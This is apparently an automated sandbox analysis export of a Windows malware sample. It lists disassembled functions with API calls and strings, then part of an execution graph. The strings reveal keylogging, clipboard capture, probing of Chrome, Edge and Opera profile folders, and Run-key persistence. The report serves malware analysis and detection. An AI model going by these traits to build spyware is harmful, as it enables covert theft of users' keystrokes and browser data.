                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0
                                      • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                      • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                                      • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                      • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHandling__start
                                      • String ID: pow
                                      • API String ID: 3213639722-2276729525
                                      • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                      • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                      • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                      • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                                        • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                        • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                        • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                        • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                      • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                                      Strings
                                      • /sort "Visit Time" /stext ", xrefs: 00404092
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                      • String ID: /sort "Visit Time" /stext "
                                      • API String ID: 368326130-1573945896
                                      • Opcode ID: 550be8277effb73c2732cc7d10f8e87d95647789aa2e0b5163ae73b1653c075b
                                      • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                                      • Opcode Fuzzy Hash: 550be8277effb73c2732cc7d10f8e87d95647789aa2e0b5163ae73b1653c075b
                                      • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                                      APIs
                                        • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                      • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Init_thread_footer__onexit
                                      • String ID: [End of clipboard]$[Text copied to clipboard]
                                      • API String ID: 1881088180-3686566968
                                      • Opcode ID: 409ffa6571f87554177c9675a230e2a6cfa367e42466273189357a0be1a0078a
                                      • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                      • Opcode Fuzzy Hash: 409ffa6571f87554177c9675a230e2a6cfa367e42466273189357a0be1a0078a
                                      • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                      APIs
                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ACP$OCP
                                      • API String ID: 0-711371036
                                      • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                      • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                                      • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                      • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                                      APIs
                                      • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                      • IsWindowVisible.USER32(?), ref: 00415B37
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$TextVisible
                                      • String ID: (%G
                                      • API String ID: 1670992164-3377777310
                                      • Opcode ID: c3052fea64783b352bd05cc40ca656872e3eb0c7e2e7178892414b932cee8744
                                      • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                                      • Opcode Fuzzy Hash: c3052fea64783b352bd05cc40ca656872e3eb0c7e2e7178892414b932cee8744
                                      • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                                      APIs
                                      • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                                      Strings
                                      • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: Connection KeepAlive | Enabled | Timeout:
                                      • API String ID: 481472006-507513762
                                      • Opcode ID: 38a968fbfb39420bb19cc7190e3be632f606f2fd3d51ef38d5bd9d39a9ed176f
                                      • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                                      • Opcode Fuzzy Hash: 38a968fbfb39420bb19cc7190e3be632f606f2fd3d51ef38d5bd9d39a9ed176f
                                      • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                      • ___raise_securityfailure.LIBCMT ref: 00432E76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                      • String ID: (F
                                      • API String ID: 3761405300-3109638091
                                      • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                      • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                                      • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                      • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                                      APIs
                                      • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: | $%02i:%02i:%02i:%03i
                                      • API String ID: 481472006-2430845779
                                      • Opcode ID: 07f86f52f9fe5ad8dc19ba50befdd62a3544993bc388c75ec5461e2102273a9c
                                      • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                                      • Opcode Fuzzy Hash: 07f86f52f9fe5ad8dc19ba50befdd62a3544993bc388c75ec5461e2102273a9c
                                      • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: alarm.wav$x(G
                                      • API String ID: 1174141254-2413638199
                                      • Opcode ID: ec4dc8efffb4439fa94e01f06dffd772dc7faa7a3ad025e8bf9025eedbd20a16
                                      • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                                      • Opcode Fuzzy Hash: ec4dc8efffb4439fa94e01f06dffd772dc7faa7a3ad025e8bf9025eedbd20a16
                                      • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                                      APIs
                                        • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A0BE
                                        • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      • CloseHandle.KERNEL32(?), ref: 00409FFD
                                      • UnhookWindowsHookEx.USER32 ref: 0040A010
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                      • String ID: Online Keylogger Stopped
                                      • API String ID: 1623830855-1496645233
                                      • Opcode ID: 2f689d8c66cd71aed3fb3457808a67c8055ac6b04fce4bb5bd7fe8cc945093f8
                                      • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                                      • Opcode Fuzzy Hash: 2f689d8c66cd71aed3fb3457808a67c8055ac6b04fce4bb5bd7fe8cc945093f8
                                      • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                      • API String ID: 1174141254-2800177040
                                      • Opcode ID: 13c28a9858d8f3b76e1a4297a73bbccd845056b1e561d4d63fc11a83420adf7f
                                      • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                                      • Opcode Fuzzy Hash: 13c28a9858d8f3b76e1a4297a73bbccd845056b1e561d4d63fc11a83420adf7f
                                      • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                      • API String ID: 1174141254-4188645398
                                      • Opcode ID: 1e8b1e20b74d3acb09f0c2f7f1b06be02aaa18328d08e9bc828850deb2a5e528
                                      • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                                      • Opcode Fuzzy Hash: 1e8b1e20b74d3acb09f0c2f7f1b06be02aaa18328d08e9bc828850deb2a5e528
                                      • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: AppData$\Opera Software\Opera Stable\
                                      • API String ID: 1174141254-1629609700
                                      • Opcode ID: e34cd4e4e94ef1fbe4e527678235412c8a4d093d5e7545370715aeb3fec738f6
                                      • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                                      • Opcode Fuzzy Hash: e34cd4e4e94ef1fbe4e527678235412c8a4d093d5e7545370715aeb3fec738f6
                                      • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                                      APIs
                                      • GetKeyState.USER32(00000011), ref: 0040A597
                                        • Part of subcall function 00409468: GetForegroundWindow.USER32(00000000,?,00000000), ref: 0040949C
                                        • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                        • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                        • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                        • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                        • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                        • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                      • String ID: [AltL]$[AltR]
                                      • API String ID: 3195419117-2658077756
                                      • Opcode ID: 8dae34f89de96c6c02dc0d6ff7c70c3eb685e242e5f7f576f368cf6eb2bad9c2
                                      • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                                      • Opcode Fuzzy Hash: 8dae34f89de96c6c02dc0d6ff7c70c3eb685e242e5f7f576f368cf6eb2bad9c2
                                      • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                                      APIs
                                      • GetKeyState.USER32(00000012), ref: 0040A5F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State
                                      • String ID: [CtrlL]$[CtrlR]
                                      • API String ID: 1649606143-2446555240
                                      • Opcode ID: 8e7e769867d94fe63cd06e7140cf990a5fd4f428e2263eac50557698d3f8299e
                                      • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                                      • Opcode Fuzzy Hash: 8e7e769867d94fe63cd06e7140cf990a5fd4f428e2263eac50557698d3f8299e
                                      • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,004721E8,80000002,80000002,0040BD02,00000000,?,00472200,pth_unenc,004721E8), ref: 00412422
                                      • RegDeleteValueW.ADVAPI32(004721E8,?,?,00472200,pth_unenc,004721E8), ref: 00412436
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412420
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteOpenValue
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                      • API String ID: 2654517830-1051519024
                                      • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                      • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                                      • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                      • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                                      APIs
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433064
                                        • Part of subcall function 00432FCD: std::exception::exception.LIBCONCRT ref: 00432FDA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00433072
                                        • Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                      • String ID: P@
                                      • API String ID: 1586462112-676759640
                                      • Opcode ID: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
                                      • Instruction ID: 0bfe0c8ac6dbc9b0d4453f7df384559b02cf33d5589a4338b6e2a72978291aeb
                                      • Opcode Fuzzy Hash: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
                                      • Instruction Fuzzy Hash: 5CC08034C0020C77CB00F6E1C907C8D773C5D04300F405416B51091081E774531D96D5
                                      APIs
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433044
                                        • Part of subcall function 00432F76: std::exception::exception.LIBCONCRT ref: 00432F83
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00433052
                                        • Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                      • String ID: P@
                                      • API String ID: 1586462112-676759640
                                      • Opcode ID: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
                                      • Instruction ID: 865ee2ddef0a897f612f6fb2ad11127a6c44acc13293d016e759f8d59b40e8c3
                                      • Opcode Fuzzy Hash: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
                                      • Instruction Fuzzy Hash: 15C08034C0010CB7CB00FAF5D907D8E773C5904340F409015B61091041E7B8631C87C5
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                      • GetLastError.KERNEL32 ref: 0043B4E9
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1717984340-0
                                      • Opcode ID: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
                                      • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                                      • Opcode Fuzzy Hash: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
                                      • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                                      APIs
                                      • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00410955), ref: 004105F1
                                      • IsBadReadPtr.KERNEL32(?,00000014,00410955), ref: 004106BD
                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106DF
                                      • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastRead
                                      • String ID:
                                      • API String ID: 4100373531-0
                                      • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                      • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                                      • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                      • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19

                                      Execution Graph

                                      Execution Coverage:1.7%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:616
                                      Total number of Limit Nodes:12
                                      execution_graph 45791 404e06 WaitForSingleObject 45792 404e20 SetEvent FindCloseChangeNotification 45791->45792 45793 404e37 closesocket 45791->45793 45795 404eb8 45792->45795 45794 404e44 45793->45794 45796 404e5a 45794->45796 45804 4050c4 83 API calls 45794->45804 45798 404e6c WaitForSingleObject 45796->45798 45799 404eae SetEvent CloseHandle 45796->45799 45805 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45798->45805 45799->45795 45801 404e7b SetEvent WaitForSingleObject 45806 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45801->45806 45803 404e93 SetEvent CloseHandle CloseHandle 45803->45799 45804->45796 45805->45801 45806->45803 45807 40163e 45808 401646 45807->45808 45809 401649 45807->45809 45810 401688 45809->45810 45813 401676 45809->45813 45815 43229f 45810->45815 45812 40167c 45814 43229f new 22 API calls 45813->45814 45814->45812 45819 4322a4 45815->45819 45817 4322d0 45817->45812 45819->45817 45822 439adb 45819->45822 45829 440480 7 API calls 2 library calls 45819->45829 45830 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45819->45830 45831 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45819->45831 45827 443649 __Getctype 45822->45827 45823 443687 45833 43ad91 20 API calls _free 45823->45833 45824 443672 RtlAllocateHeap 45826 443685 45824->45826 45824->45827 45826->45819 45827->45823 45827->45824 45832 440480 7 API calls 2 library calls 45827->45832 45829->45819 45832->45827 45833->45826 45834 43263c 45835 432648 ___FrameUnwindToState 45834->45835 45860 43234b 45835->45860 45837 43264f 45839 432678 45837->45839 46124 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 45837->46124 45846 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 45839->45846 46125 441763 5 API calls _ValidateLocalCookies 45839->46125 45841 432691 45843 432697 ___FrameUnwindToState 45841->45843 46126 441707 5 API calls _ValidateLocalCookies 45841->46126 45844 432717 45871 4328c9 45844->45871 45846->45844 46127 4408e7 35 API calls 5 library calls 45846->46127 45855 432743 45857 43274c 45855->45857 46128 4408c2 28 API calls _abort 45855->46128 46129 4324c2 13 API calls 2 library calls 45857->46129 45861 432354 45860->45861 46130 4329da IsProcessorFeaturePresent 45861->46130 45863 432360 46131 436cd1 10 API calls 4 library calls 45863->46131 45865 432365 45870 432369 45865->45870 46132 4415bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45865->46132 45867 432380 45867->45837 45868 432372 45868->45867 46133 436cfa 8 API calls 3 library calls 45868->46133 45870->45837 46134 434c30 45871->46134 45874 43271d 45875 4416b4 45874->45875 46136 44c239 45875->46136 45877 4416bd 45878 432726 45877->45878 46140 443d25 35 API calls 45877->46140 45880 40d3f0 45878->45880 46142 41a8da LoadLibraryA GetProcAddress 45880->46142 45882 40d40c 46149 40dd83 45882->46149 45884 40d415 46164 4020d6 45884->46164 45887 4020d6 28 API calls 45888 40d433 45887->45888 46170 419d87 45888->46170 45892 40d445 46196 401e6d 45892->46196 45894 40d44e 45895 40d461 45894->45895 45896 40d4b8 45894->45896 46202 40e609 45895->46202 45897 401e45 22 API calls 45896->45897 45899 40d4c6 45897->45899 45903 401e45 22 API calls 45899->45903 45902 40d47f 46217 40f98d 45902->46217 45904 40d4e5 45903->45904 46233 4052fe 45904->46233 45907 40d4f4 46238 408209 45907->46238 45916 40d4a3 45918 401fb8 11 API calls 45916->45918 45920 40d4ac 45918->45920 46119 4407f6 GetModuleHandleW 45920->46119 45921 401fb8 11 API calls 45922 40d520 45921->45922 45923 401e45 22 API calls 45922->45923 45924 40d529 45923->45924 46255 401fa0 45924->46255 45926 40d534 45927 401e45 22 API calls 45926->45927 45928 40d54f 45927->45928 45929 401e45 22 API calls 45928->45929 45930 40d569 45929->45930 45931 40d5cf 45930->45931 46259 40822a 28 API calls 45930->46259 45933 401e45 22 API calls 45931->45933 45938 40d5dc 45933->45938 45934 40d594 45935 401fc2 28 API calls 45934->45935 45936 40d5a0 45935->45936 45939 401fb8 11 API calls 45936->45939 45937 40d650 45943 40d660 CreateMutexA GetLastError 45937->45943 45938->45937 45940 401e45 22 API calls 45938->45940 45941 40d5a9 45939->45941 45942 40d5f5 45940->45942 46260 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45941->46260 45946 40d5fc OpenMutexA 45942->45946 45944 40d987 45943->45944 45945 40d67f 45943->45945 45949 401fb8 11 API calls 45944->45949 45987 40d9ec 45944->45987 45947 40d688 45945->45947 45948 40d68a GetModuleFileNameW 45945->45948 45951 40d622 45946->45951 45952 40d60f WaitForSingleObject CloseHandle 45946->45952 45947->45948 46263 4192ae 33 API calls 45948->46263 45973 40d99a ___scrt_fastfail 45949->45973 46261 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45951->46261 45952->45951 45954 40d5c5 45954->45931 45956 40dd0f 45954->45956 45955 40d6a0 45957 40d6f5 45955->45957 45959 401e45 22 API calls 45955->45959 46293 41239a 30 